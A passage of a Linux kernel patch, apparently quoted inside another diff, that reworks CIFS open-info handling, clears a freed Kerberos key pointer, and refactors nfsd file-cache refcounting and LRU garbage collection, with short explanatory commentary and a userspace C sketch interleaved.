+@@ -428,6 +428,7 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms.disposition = FILE_CREATE;
+ 	oparms.fid = &fid;
+ 	oparms.reconnect = false;
++	oparms.mode = 0644;
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+index 50480751e521c..4cb364454e130 100644
+--- a/fs/cifs/smb1ops.c
++++ b/fs/cifs/smb1ops.c
+@@ -562,17 +562,20 @@ static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if ((rc == -EOPNOTSUPP) || (rc == -EINVAL)) {
+ 		rc = SMBQueryInformation(xid, tcon, full_path, &fi, cifs_sb->local_nls,
+ 					 cifs_remap(cifs_sb));
+-		if (!rc)
+-			move_cifs_info_to_smb2(&data->fi, &fi);
+ 		*adjustTZ = true;
+ 	}
+ 
+-	if (!rc && (le32_to_cpu(fi.Attributes) & ATTR_REPARSE)) {
++	if (!rc) {
+ 		int tmprc;
+ 		int oplock = 0;
+ 		struct cifs_fid fid;
+ 		struct cifs_open_parms oparms;
+ 
++		move_cifs_info_to_smb2(&data->fi, &fi);
++
++		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
++			return 0;
++
+ 		oparms.tcon = tcon;
+ 		oparms.cifs_sb = cifs_sb;
+ 		oparms.desired_access = FILE_READ_ATTRIBUTES;
+@@ -716,17 +719,25 @@ cifs_mkdir_setinfo(struct inode *inode, const char *full_path,
+ static int cifs_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
+ 			  void *buf)
+ {
+-	FILE_ALL_INFO *fi = buf;
++	struct cifs_open_info_data *data = buf;
++	FILE_ALL_INFO fi = {};
++	int rc;
+ 
+ 	if (!(oparms->tcon->ses->capabilities & CAP_NT_SMBS))
+-		return SMBLegacyOpen(xid, oparms->tcon, oparms->path,
+-				     oparms->disposition,
+-				     oparms->desired_access,
+-				     oparms->create_options,
+-				     &oparms->fid->netfid, oplock, fi,
+-				     oparms->cifs_sb->local_nls,
+-				     cifs_remap(oparms->cifs_sb));
+-	return CIFS_open(xid, oparms, oplock, fi);
++		rc = SMBLegacyOpen(xid, oparms->tcon, oparms->path,
++				   oparms->disposition,
++				   oparms->desired_access,
++				   oparms->create_options,
++				   &oparms->fid->netfid, oplock, &fi,
++				   oparms->cifs_sb->local_nls,
++				   cifs_remap(oparms->cifs_sb));
++	else
++		rc = CIFS_open(xid, oparms, oplock, &fi);
++
++	if (!rc && data)
++		move_cifs_info_to_smb2(&data->fi, &fi);
++
++	return rc;
+ }
+ 
+ static void
+@@ -1050,7 +1061,7 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+ 	struct inode *newinode = NULL;
+ 	int rc = -EPERM;
+-	FILE_ALL_INFO *buf = NULL;
++	struct cifs_open_info_data buf = {};
+ 	struct cifs_io_parms io_parms;
+ 	__u32 oplock = 0;
+ 	struct cifs_fid fid;
+@@ -1082,14 +1093,14 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 					    cifs_sb->local_nls,
+ 					    cifs_remap(cifs_sb));
+ 		if (rc)
+-			goto out;
++			return rc;
+ 
+ 		rc = cifs_get_inode_info_unix(&newinode, full_path,
+ 					      inode->i_sb, xid);
+ 
+ 		if (rc == 0)
+ 			d_instantiate(dentry, newinode);
+-		goto out;
++		return rc;
+ 	}
+ 
+ 	/*
+@@ -1097,19 +1108,13 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 	 * support block and char device (no socket & fifo)
+ 	 */
+ 	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
+-		goto out;
++		return rc;
+ 
+ 	if (!S_ISCHR(mode) && !S_ISBLK(mode))
+-		goto out;
++		return rc;
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	buf = kmalloc(sizeof(FILE_ALL_INFO), GFP_KERNEL);
+-	if (buf == NULL) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+ 	oparms.tcon = tcon;
+ 	oparms.cifs_sb = cifs_sb;
+ 	oparms.desired_access = GENERIC_WRITE;
+@@ -1124,21 +1129,21 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 		oplock = REQ_OPLOCK;
+ 	else
+ 		oplock = 0;
+-	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, buf);
++	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
+ 	if (rc)
+-		goto out;
++		return rc;
+ 
+ 	/*
+ 	 * BB Do not bother to decode buf since no local inode yet to put
+ 	 * timestamps in, but we can reuse it safely.
+ 	 */
+ 
+-	pdev = (struct win_dev *)buf;
++	pdev = (struct win_dev *)&buf.fi;
+ 	io_parms.pid = current->tgid;
+ 	io_parms.tcon = tcon;
+ 	io_parms.offset = 0;
+ 	io_parms.length = sizeof(struct win_dev);
+-	iov[1].iov_base = buf;
++	iov[1].iov_base = &buf.fi;
+ 	iov[1].iov_len = sizeof(struct win_dev);
+ 	if (S_ISCHR(mode)) {
+ 		memcpy(pdev->type, "IntxCHR", 8);
+@@ -1157,8 +1162,8 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 	d_drop(dentry);
+ 
+ 	/* FIXME: add code here to set EAs */
+-out:
+-	kfree(buf);
++
++	cifs_free_open_info(&buf);
+ 	return rc;
+ }
+ 
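
The smb1ops.c hunks do two things: the legacy FILE_ALL_INFO result is now converted into the caller's cifs_open_info_data on every successful query (not just in the SMBQueryInformation fallback), and cifs_open_file()/cifs_make_node() trade a kmalloc'ed FILE_ALL_INFO for an on-stack buffer translated only on success, removing an allocation and its error handling. A compilable userspace sketch of that shape, with invented names:

    #include <stdio.h>

    struct legacy_info { int attrs; };
    struct open_info   { int attrs; };

    static int backend_open(struct legacy_info *out)
    {
        out->attrs = 0x20;              /* pretend the server replied */
        return 0;                       /* 0 == success */
    }

    static int open_file(struct open_info *data)
    {
        struct legacy_info fi = {0};    /* stack buffer, no malloc/free */
        int rc = backend_open(&fi);

        if (!rc && data)
            data->attrs = fi.attrs;     /* convert only on success */
        return rc;
    }

    int main(void)
    {
        struct open_info data = {0};

        printf("rc=%d attrs=%#x\n", open_file(&data), data.attrs);
        return 0;
    }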
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index a5695748a89b1..4ac5b1bfaf781 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -1479,8 +1479,11 @@ SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+ out_put_spnego_key:
+ 	key_invalidate(spnego_key);
+ 	key_put(spnego_key);
+-	if (rc)
++	if (rc) {
+ 		kfree_sensitive(ses->auth_key.response);
++		ses->auth_key.response = NULL;
++		ses->auth_key.len = 0;
++	}
+ out:
+ 	sess_data->result = rc;
+ 	sess_data->func = NULL;
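
The SMB2_auth_kerberos() change is the classic free-and-reset idiom: after kfree_sensitive() the stale pointer and length are cleared so a later teardown path cannot free the key material a second time or trust a dangling length. A runnable userspace model (stand-in types; the kernel's kfree_sensitive() also zeroes the buffer before freeing, mimicked here with memset):

    #include <stdlib.h>
    #include <string.h>

    struct auth_key { unsigned char *response; unsigned int len; };

    static void auth_key_clear(struct auth_key *k)
    {
        if (k->response)
            memset(k->response, 0, k->len);  /* scrub secrets first */
        free(k->response);
        k->response = NULL;                  /* make a second clear harmless */
        k->len = 0;
    }

    int main(void)
    {
        struct auth_key k = { .response = malloc(16), .len = 16 };

        auth_key_clear(&k);
        auth_key_clear(&k);                  /* safe: free(NULL) is a no-op */
        return 0;
    }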
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index ec3fceb92236e..ea6fb0e6b1655 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -33,7 +33,6 @@ static DEFINE_PER_CPU(unsigned long, nfsd_file_cache_hits);
+ static DEFINE_PER_CPU(unsigned long, nfsd_file_acquisitions);
+ static DEFINE_PER_CPU(unsigned long, nfsd_file_releases);
+ static DEFINE_PER_CPU(unsigned long, nfsd_file_total_age);
+-static DEFINE_PER_CPU(unsigned long, nfsd_file_pages_flushed);
+ static DEFINE_PER_CPU(unsigned long, nfsd_file_evictions);
+ 
+ struct nfsd_fcache_disposal {
+@@ -63,6 +62,7 @@ struct nfsd_file_lookup_key {
+ 	struct net			*net;
+ 	const struct cred		*cred;
+ 	unsigned char			need;
++	bool				gc;
+ 	enum nfsd_file_lookup_type	type;
+ };
+ 
+@@ -162,6 +162,8 @@ static int nfsd_file_obj_cmpfn(struct rhashtable_compare_arg *arg,
+ 			return 1;
+ 		if (!nfsd_match_cred(nf->nf_cred, key->cred))
+ 			return 1;
++		if (!!test_bit(NFSD_FILE_GC, &nf->nf_flags) != key->gc)
++			return 1;
+ 		if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags) == 0)
+ 			return 1;
+ 		break;
+@@ -297,56 +299,28 @@ nfsd_file_alloc(struct nfsd_file_lookup_key *key, unsigned int may)
+ 		nf->nf_flags = 0;
+ 		__set_bit(NFSD_FILE_HASHED, &nf->nf_flags);
+ 		__set_bit(NFSD_FILE_PENDING, &nf->nf_flags);
++		if (key->gc)
++			__set_bit(NFSD_FILE_GC, &nf->nf_flags);
+ 		nf->nf_inode = key->inode;
+-		/* nf_ref is pre-incremented for hash table */
+-		refcount_set(&nf->nf_ref, 2);
++		refcount_set(&nf->nf_ref, 1);
+ 		nf->nf_may = key->need;
+ 		nf->nf_mark = NULL;
+ 	}
+ 	return nf;
+ }
+ 
+-static bool
+-nfsd_file_free(struct nfsd_file *nf)
+-{
+-	s64 age = ktime_to_ms(ktime_sub(ktime_get(), nf->nf_birthtime));
+-	bool flush = false;
+-
+-	this_cpu_inc(nfsd_file_releases);
+-	this_cpu_add(nfsd_file_total_age, age);
+-
+-	trace_nfsd_file_put_final(nf);
+-	if (nf->nf_mark)
+-		nfsd_file_mark_put(nf->nf_mark);
+-	if (nf->nf_file) {
+-		get_file(nf->nf_file);
+-		filp_close(nf->nf_file, NULL);
+-		fput(nf->nf_file);
+-		flush = true;
+-	}
+-
+-	/*
+-	 * If this item is still linked via nf_lru, that's a bug.
+-	 * WARN and leak it to preserve system stability.
+-	 */
+-	if (WARN_ON_ONCE(!list_empty(&nf->nf_lru)))
+-		return flush;
+-
+-	call_rcu(&nf->nf_rcu, nfsd_file_slab_free);
+-	return flush;
+-}
+-
+-static bool
+-nfsd_file_check_writeback(struct nfsd_file *nf)
++static void
++nfsd_file_fsync(struct nfsd_file *nf)
+ {
+ 	struct file *file = nf->nf_file;
+-	struct address_space *mapping;
++	int ret;
+ 
+ 	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return false;
+-	mapping = file->f_mapping;
+-	return mapping_tagged(mapping, PAGECACHE_TAG_DIRTY) ||
+-		mapping_tagged(mapping, PAGECACHE_TAG_WRITEBACK);
++		return;
++	ret = vfs_fsync(file, 1);
++	trace_nfsd_file_fsync(nf, ret);
++	if (ret)
++		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ }
+ 
+ static int
+@@ -359,31 +333,6 @@ nfsd_file_check_write_error(struct nfsd_file *nf)
+ 	return filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err));
+ }
+ 
+-static void
+-nfsd_file_flush(struct nfsd_file *nf)
+-{
+-	struct file *file = nf->nf_file;
+-
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return;
+-	this_cpu_add(nfsd_file_pages_flushed, file->f_mapping->nrpages);
+-	if (vfs_fsync(file, 1) != 0)
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+-}
+-
+-static void nfsd_file_lru_add(struct nfsd_file *nf)
+-{
+-	set_bit(NFSD_FILE_REFERENCED, &nf->nf_flags);
+-	if (list_lru_add(&nfsd_file_lru, &nf->nf_lru))
+-		trace_nfsd_file_lru_add(nf);
+-}
+-
+-static void nfsd_file_lru_remove(struct nfsd_file *nf)
+-{
+-	if (list_lru_del(&nfsd_file_lru, &nf->nf_lru))
+-		trace_nfsd_file_lru_del(nf);
+-}
+-
+ static void
+ nfsd_file_hash_remove(struct nfsd_file *nf)
+ {
+@@ -406,60 +355,76 @@ nfsd_file_unhash(struct nfsd_file *nf)
+ }
+ 
+ static void
+-nfsd_file_unhash_and_dispose(struct nfsd_file *nf, struct list_head *dispose)
++nfsd_file_free(struct nfsd_file *nf)
+ {
+-	trace_nfsd_file_unhash_and_dispose(nf);
+-	if (nfsd_file_unhash(nf)) {
+-		/* caller must call nfsd_file_dispose_list() later */
+-		nfsd_file_lru_remove(nf);
+-		list_add(&nf->nf_lru, dispose);
++	s64 age = ktime_to_ms(ktime_sub(ktime_get(), nf->nf_birthtime));
++
++	trace_nfsd_file_free(nf);
++
++	this_cpu_inc(nfsd_file_releases);
++	this_cpu_add(nfsd_file_total_age, age);
++
++	nfsd_file_unhash(nf);
++
++	/*
++	 * We call fsync here in order to catch writeback errors. It's not
++	 * strictly required by the protocol, but an nfsd_file could get
++	 * evicted from the cache before a COMMIT comes in. If another
++	 * task were to open that file in the interim and scrape the error,
++	 * then the client may never see it. By calling fsync here, we ensure
++	 * that writeback happens before the entry is freed, and that any
++	 * errors reported result in the write verifier changing.
++	 */
++	nfsd_file_fsync(nf);
++
++	if (nf->nf_mark)
++		nfsd_file_mark_put(nf->nf_mark);
++	if (nf->nf_file) {
++		get_file(nf->nf_file);
++		filp_close(nf->nf_file, NULL);
++		fput(nf->nf_file);
+ 	}
++
++	/*
++	 * If this item is still linked via nf_lru, that's a bug.
++	 * WARN and leak it to preserve system stability.
++	 */
++	if (WARN_ON_ONCE(!list_empty(&nf->nf_lru)))
++		return;
++
++	call_rcu(&nf->nf_rcu, nfsd_file_slab_free);
+ }
+ 
+-static void
+-nfsd_file_put_noref(struct nfsd_file *nf)
++static bool
++nfsd_file_check_writeback(struct nfsd_file *nf)
+ {
+-	trace_nfsd_file_put(nf);
++	struct file *file = nf->nf_file;
++	struct address_space *mapping;
+ 
+-	if (refcount_dec_and_test(&nf->nf_ref)) {
+-		WARN_ON(test_bit(NFSD_FILE_HASHED, &nf->nf_flags));
+-		nfsd_file_lru_remove(nf);
+-		nfsd_file_free(nf);
+-	}
++	if (!file || !(file->f_mode & FMODE_WRITE))
++		return false;
++	mapping = file->f_mapping;
++	return mapping_tagged(mapping, PAGECACHE_TAG_DIRTY) ||
++		mapping_tagged(mapping, PAGECACHE_TAG_WRITEBACK);
+ }
+ 
+-void
+-nfsd_file_put(struct nfsd_file *nf)
++static bool nfsd_file_lru_add(struct nfsd_file *nf)
+ {
+-	might_sleep();
+-
+-	nfsd_file_lru_add(nf);
+-	if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags) == 0) {
+-		nfsd_file_flush(nf);
+-		nfsd_file_put_noref(nf);
+-	} else if (nf->nf_file) {
+-		nfsd_file_put_noref(nf);
+-		nfsd_file_schedule_laundrette();
+-	} else
+-		nfsd_file_put_noref(nf);
++	set_bit(NFSD_FILE_REFERENCED, &nf->nf_flags);
++	if (list_lru_add(&nfsd_file_lru, &nf->nf_lru)) {
++		trace_nfsd_file_lru_add(nf);
++		return true;
++	}
++	return false;
+ }
+ 
+-/**
+- * nfsd_file_close - Close an nfsd_file
+- * @nf: nfsd_file to close
+- *
+- * If this is the final reference for @nf, free it immediately.
+- * This reflects an on-the-wire CLOSE or DELEGRETURN into the
+- * VFS and exported filesystem.
+- */
+-void nfsd_file_close(struct nfsd_file *nf)
++static bool nfsd_file_lru_remove(struct nfsd_file *nf)
+ {
+-	nfsd_file_put(nf);
+-	if (refcount_dec_if_one(&nf->nf_ref)) {
+-		nfsd_file_unhash(nf);
+-		nfsd_file_lru_remove(nf);
+-		nfsd_file_free(nf);
++	if (list_lru_del(&nfsd_file_lru, &nf->nf_lru)) {
++		trace_nfsd_file_lru_del(nf);
++		return true;
+ 	}
++	return false;
+ }
+ 
+ struct nfsd_file *
+@@ -470,36 +435,60 @@ nfsd_file_get(struct nfsd_file *nf)
+ 	return NULL;
+ }
+ 
+-static void
+-nfsd_file_dispose_list(struct list_head *dispose)
++/**
++ * nfsd_file_put - put the reference to a nfsd_file
++ * @nf: nfsd_file of which to put the reference
++ *
++ * Put a reference to an nfsd_file. In the non-GC case, the reference is
++ * put immediately. In the GC case, if this would be the last reference,
++ * then put it on the LRU instead, to be cleaned up later.
++ */
++void
++nfsd_file_put(struct nfsd_file *nf)
+ {
+-	struct nfsd_file *nf;
++	might_sleep();
++	trace_nfsd_file_put(nf);
+ 
+-	while(!list_empty(dispose)) {
+-		nf = list_first_entry(dispose, struct nfsd_file, nf_lru);
+-		list_del_init(&nf->nf_lru);
+-		nfsd_file_flush(nf);
+-		nfsd_file_put_noref(nf);
++	if (test_bit(NFSD_FILE_GC, &nf->nf_flags) &&
++	    test_bit(NFSD_FILE_HASHED, &nf->nf_flags)) {
++		/*
++		 * If this is the last reference (nf_ref == 1), then try to
++		 * transfer it to the LRU.
++		 */
++		if (refcount_dec_not_one(&nf->nf_ref))
++			return;
++
++		/* Try to add it to the LRU.  If that fails, decrement. */
++		if (nfsd_file_lru_add(nf)) {
++			/* If it's still hashed, we're done */
++			if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags)) {
++				nfsd_file_schedule_laundrette();
++				return;
++			}
++
++			/*
++			 * We're racing with unhashing, so try to remove it from
++			 * the LRU. If removal fails, then someone else already
++			 * has our reference.
++			 */
++			if (!nfsd_file_lru_remove(nf))
++				return;
++		}
+ 	}
++	if (refcount_dec_and_test(&nf->nf_ref))
++		nfsd_file_free(nf);
+ }
+ 
+ static void
+-nfsd_file_dispose_list_sync(struct list_head *dispose)
++nfsd_file_dispose_list(struct list_head *dispose)
+ {
+-	bool flush = false;
+ 	struct nfsd_file *nf;
+ 
+-	while(!list_empty(dispose)) {
++	while (!list_empty(dispose)) {
+ 		nf = list_first_entry(dispose, struct nfsd_file, nf_lru);
+ 		list_del_init(&nf->nf_lru);
+-		nfsd_file_flush(nf);
+-		if (!refcount_dec_and_test(&nf->nf_ref))
+-			continue;
+-		if (nfsd_file_free(nf))
+-			flush = true;
++		nfsd_file_free(nf);
+ 	}
+-	if (flush)
+-		flush_delayed_fput();
+ }
+ 
+ static void
+@@ -569,21 +558,8 @@ nfsd_file_lru_cb(struct list_head *item, struct list_lru_one *lru,
+ 	struct list_head *head = arg;
+ 	struct nfsd_file *nf = list_entry(item, struct nfsd_file, nf_lru);
+ 
+-	/*
+-	 * Do a lockless refcount check. The hashtable holds one reference, so
+-	 * we look to see if anything else has a reference, or if any have
+-	 * been put since the shrinker last ran. Those don't get unhashed and
+-	 * released.
+-	 *
+-	 * Note that in the put path, we set the flag and then decrement the
+-	 * counter. Here we check the counter and then test and clear the flag.
+-	 * That order is deliberate to ensure that we can do this locklessly.
+-	 */
+-	if (refcount_read(&nf->nf_ref) > 1) {
+-		list_lru_isolate(lru, &nf->nf_lru);
+-		trace_nfsd_file_gc_in_use(nf);
+-		return LRU_REMOVED;
+-	}
++	/* We should only be dealing with GC entries here */
++	WARN_ON_ONCE(!test_bit(NFSD_FILE_GC, &nf->nf_flags));
+ 
+ 	/*
+ 	 * Don't throw out files that are still undergoing I/O or
+@@ -594,40 +570,30 @@ nfsd_file_lru_cb(struct list_head *item, struct list_lru_one *lru,
+ 		return LRU_SKIP;
+ 	}
+ 
++	/* If it was recently added to the list, skip it */
+ 	if (test_and_clear_bit(NFSD_FILE_REFERENCED, &nf->nf_flags)) {
+ 		trace_nfsd_file_gc_referenced(nf);
+ 		return LRU_ROTATE;
+ 	}
+ 
+-	if (!test_and_clear_bit(NFSD_FILE_HASHED, &nf->nf_flags)) {
+-		trace_nfsd_file_gc_hashed(nf);
+-		return LRU_SKIP;
++	/*
++	 * Put the reference held on behalf of the LRU. If it wasn't the last
++	 * one, then just remove it from the LRU and ignore it.
++	 */
++	if (!refcount_dec_and_test(&nf->nf_ref)) {
++		trace_nfsd_file_gc_in_use(nf);
++		list_lru_isolate(lru, &nf->nf_lru);
++		return LRU_REMOVED;
+ 	}
+ 
++	/* Refcount went to zero. Unhash it and queue it to the dispose list */
++	nfsd_file_unhash(nf);
+ 	list_lru_isolate_move(lru, &nf->nf_lru, head);
+ 	this_cpu_inc(nfsd_file_evictions);
+ 	trace_nfsd_file_gc_disposed(nf);
+ 	return LRU_REMOVED;
+ }
+ 
+-/*
+- * Unhash items on @dispose immediately, then queue them on the
+- * disposal workqueue to finish releasing them in the background.
+- *
+- * cel: Note that between the time list_lru_shrink_walk runs and
+- * now, these items are in the hash table but marked unhashed.
+- * Why release these outside of lru_cb ? There's no lock ordering
+- * problem since lru_cb currently takes no lock.
+- */
+-static void nfsd_file_gc_dispose_list(struct list_head *dispose)
+-{
+-	struct nfsd_file *nf;
+-
+-	list_for_each_entry(nf, dispose, nf_lru)
+-		nfsd_file_hash_remove(nf);
+-	nfsd_file_dispose_list_delayed(dispose);
+-}
+-
+ static void
+ nfsd_file_gc(void)
+ {
+@@ -637,7 +603,7 @@ nfsd_file_gc(void)
+ 	ret = list_lru_walk(&nfsd_file_lru, nfsd_file_lru_cb,
+ 			    &dispose, list_lru_count(&nfsd_file_lru));
+ 	trace_nfsd_file_gc_removed(ret, list_lru_count(&nfsd_file_lru));
+-	nfsd_file_gc_dispose_list(&dispose);
++	nfsd_file_dispose_list_delayed(&dispose);
+ }
+ 
+ static void
+@@ -662,7 +628,7 @@ nfsd_file_lru_scan(struct shrinker *s, struct shrink_control *sc)
+ 	ret = list_lru_shrink_walk(&nfsd_file_lru, sc,
+ 				   nfsd_file_lru_cb, &dispose);
+ 	trace_nfsd_file_shrinker_removed(ret, list_lru_count(&nfsd_file_lru));
+-	nfsd_file_gc_dispose_list(&dispose);
++	nfsd_file_dispose_list_delayed(&dispose);
+ 	return ret;
+ }
+ 
+@@ -672,72 +638,111 @@ static struct shrinker	nfsd_file_shrinker = {
+ 	.seeks = 1,
+ };
+ 
+-/*
+- * Find all cache items across all net namespaces that match @inode and
+- * move them to @dispose. The lookup is atomic wrt nfsd_file_acquire().
++/**
++ * nfsd_file_queue_for_close: try to close out any open nfsd_files for an inode
++ * @inode:   inode on which to close out nfsd_files
++ * @dispose: list on which to gather nfsd_files to close out
++ *
++ * An nfsd_file represents a struct file being held open on behalf of nfsd. An
++ * open file however can block other activity (such as leases), or cause
++ * undesirable behavior (e.g. spurious silly-renames when reexporting NFS).
++ *
++ * This function is intended to find open nfsd_files when this sort of
++ * conflicting access occurs and then attempt to close those files out.
++ *
++ * Populates the dispose list with entries that have already had their
++ * refcounts go to zero. The actual free of an nfsd_file can be expensive,
++ * so we leave it up to the caller whether it wants to wait or not.
+  */
+-static unsigned int
+-__nfsd_file_close_inode(struct inode *inode, struct list_head *dispose)
++static void
++nfsd_file_queue_for_close(struct inode *inode, struct list_head *dispose)
+ {
+ 	struct nfsd_file_lookup_key key = {
+ 		.type	= NFSD_FILE_KEY_INODE,
+ 		.inode	= inode,
+ 	};
+-	unsigned int count = 0;
+ 	struct nfsd_file *nf;
+ 
+ 	rcu_read_lock();
+ 	do {
++		int decrement = 1;
++
+ 		nf = rhashtable_lookup(&nfsd_file_rhash_tbl, &key,
+ 				       nfsd_file_rhash_params);
+ 		if (!nf)
+ 			break;
+-		nfsd_file_unhash_and_dispose(nf, dispose);
+-		count++;
++
++		/* If we raced with someone else unhashing, ignore it */
++		if (!nfsd_file_unhash(nf))
++			continue;
++
++		/* If we can't get a reference, ignore it */
++		if (!nfsd_file_get(nf))
++			continue;
++
++		/* Extra decrement if we remove from the LRU */
++		if (nfsd_file_lru_remove(nf))
++			++decrement;
++
++		/* If refcount goes to 0, then put on the dispose list */
++		if (refcount_sub_and_test(decrement, &nf->nf_ref)) {
++			list_add(&nf->nf_lru, dispose);
++			trace_nfsd_file_closing(nf);
++		}
+ 	} while (1);
+ 	rcu_read_unlock();
+-	return count;
+ }
+ 
+ /**
+- * nfsd_file_close_inode_sync - attempt to forcibly close a nfsd_file
++ * nfsd_file_close_inode - attempt a delayed close of a nfsd_file
+  * @inode: inode of the file to attempt to remove
+  *
+- * Unhash and put, then flush and fput all cache items associated with @inode.
++ * Close out any open nfsd_files that can be reaped for @inode. The
++ * actual freeing is deferred to the dispose_list_delayed infrastructure.
++ *
++ * This is used by the fsnotify callbacks and setlease notifier.
+  */
+-void
+-nfsd_file_close_inode_sync(struct inode *inode)
++static void
++nfsd_file_close_inode(struct inode *inode)
+ {
+ 	LIST_HEAD(dispose);
+-	unsigned int count;
+ 
+-	count = __nfsd_file_close_inode(inode, &dispose);
+-	trace_nfsd_file_close_inode_sync(inode, count);
+-	nfsd_file_dispose_list_sync(&dispose);
++	nfsd_file_queue_for_close(inode, &dispose);
++	nfsd_file_dispose_list_delayed(&dispose);
+ }
+ 
+ /**
+- * nfsd_file_close_inode - attempt a delayed close of a nfsd_file
++ * nfsd_file_close_inode_sync - attempt to forcibly close a nfsd_file
+  * @inode: inode of the file to attempt to remove
+  *
+- * Unhash and put all cache item associated with @inode.
++ * Close out any open nfsd_files that can be reaped for @inode. The
++ * nfsd_files are closed out synchronously.
++ *
++ * This is called from nfsd_rename and nfsd_unlink to avoid silly-renames
++ * when reexporting NFS.
+  */
+-static void
+-nfsd_file_close_inode(struct inode *inode)
++void
++nfsd_file_close_inode_sync(struct inode *inode)
+ {
++	struct nfsd_file *nf;
+ 	LIST_HEAD(dispose);
+-	unsigned int count;
+ 
+-	count = __nfsd_file_close_inode(inode, &dispose);
+-	trace_nfsd_file_close_inode(inode, count);
+-	nfsd_file_dispose_list_delayed(&dispose);
++	trace_nfsd_file_close(inode);
++
++	nfsd_file_queue_for_close(inode, &dispose);
++	while (!list_empty(&dispose)) {
++		nf = list_first_entry(&dispose, struct nfsd_file, nf_lru);
++		list_del_init(&nf->nf_lru);
++		nfsd_file_free(nf);
++	}
++	flush_delayed_fput();
+ }
+ 
+ /**
+  * nfsd_file_delayed_close - close unused nfsd_files
+  * @work: dummy
+  *
+- * Walk the LRU list and close any entries that have not been used since
++ * Walk the LRU list and destroy any entries that have not been used since
+  * the last scan.
+  */
+ static void
+@@ -759,7 +764,7 @@ nfsd_file_lease_notifier_call(struct notifier_block *nb, unsigned long arg,
+ 
+ 	/* Only close files for F_SETLEASE leases */
+ 	if (fl->fl_flags & FL_LEASE)
+-		nfsd_file_close_inode_sync(file_inode(fl->fl_file));
++		nfsd_file_close_inode(file_inode(fl->fl_file));
+ 	return 0;
+ }
+ 
+@@ -880,6 +885,13 @@ out_err:
+ 	goto out;
+ }
+ 
++/**
++ * __nfsd_file_cache_purge: clean out the cache for shutdown
++ * @net: net-namespace to shut down the cache (may be NULL)
++ *
++ * Walk the nfsd_file cache and close out any that match @net. If @net is NULL,
++ * then close out everything. Called when an nfsd instance is being shut down.
++ */
+ static void
+ __nfsd_file_cache_purge(struct net *net)
+ {
+@@ -893,8 +905,11 @@ __nfsd_file_cache_purge(struct net *net)
+ 
+ 		nf = rhashtable_walk_next(&iter);
+ 		while (!IS_ERR_OR_NULL(nf)) {
+-			if (!net || nf->nf_net == net)
+-				nfsd_file_unhash_and_dispose(nf, &dispose);
++			if (!net || nf->nf_net == net) {
++				nfsd_file_unhash(nf);
++				nfsd_file_lru_remove(nf);
++				list_add(&nf->nf_lru, &dispose);
++			}
+ 			nf = rhashtable_walk_next(&iter);
+ 		}
+ 
+@@ -1000,7 +1015,6 @@ nfsd_file_cache_shutdown(void)
+ 		per_cpu(nfsd_file_acquisitions, i) = 0;
+ 		per_cpu(nfsd_file_releases, i) = 0;
+ 		per_cpu(nfsd_file_total_age, i) = 0;
+-		per_cpu(nfsd_file_pages_flushed, i) = 0;
+ 		per_cpu(nfsd_file_evictions, i) = 0;
+ 	}
+ }
+@@ -1034,12 +1048,14 @@ nfsd_file_is_cached(struct inode *inode)
+ 
+ static __be32
+ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+-		     unsigned int may_flags, struct nfsd_file **pnf, bool open)
++		     unsigned int may_flags, struct file *file,
++		     struct nfsd_file **pnf, bool want_gc)
+ {
+ 	struct nfsd_file_lookup_key key = {
+ 		.type	= NFSD_FILE_KEY_FULL,
+ 		.need	= may_flags & NFSD_FILE_MAY_MASK,
+ 		.net	= SVC_NET(rqstp),
++		.gc	= want_gc,
+ 	};
+ 	bool open_retry = true;
+ 	struct nfsd_file *nf;
+@@ -1060,8 +1076,12 @@ retry:
+ 	if (nf)
+ 		nf = nfsd_file_get(nf);
+ 	rcu_read_unlock();
+-	if (nf)
++
++	if (nf) {
++		if (nfsd_file_lru_remove(nf))
++			WARN_ON_ONCE(refcount_dec_and_test(&nf->nf_ref));
+ 		goto wait_for_construction;
++	}
+ 
+ 	nf = nfsd_file_alloc(&key, may_flags);
+ 	if (!nf) {
+@@ -1094,55 +1114,81 @@ wait_for_construction:
+ 			goto out;
+ 		}
+ 		open_retry = false;
+-		nfsd_file_put_noref(nf);
++		if (refcount_dec_and_test(&nf->nf_ref))
++			nfsd_file_free(nf);
+ 		goto retry;
+ 	}
+ 
+-	nfsd_file_lru_remove(nf);
+ 	this_cpu_inc(nfsd_file_cache_hits);
+ 
+ 	status = nfserrno(nfsd_open_break_lease(file_inode(nf->nf_file), may_flags));
+ out:
+ 	if (status == nfs_ok) {
+-		if (open)
+-			this_cpu_inc(nfsd_file_acquisitions);
++		this_cpu_inc(nfsd_file_acquisitions);
+ 		*pnf = nf;
+ 	} else {
+-		nfsd_file_put(nf);
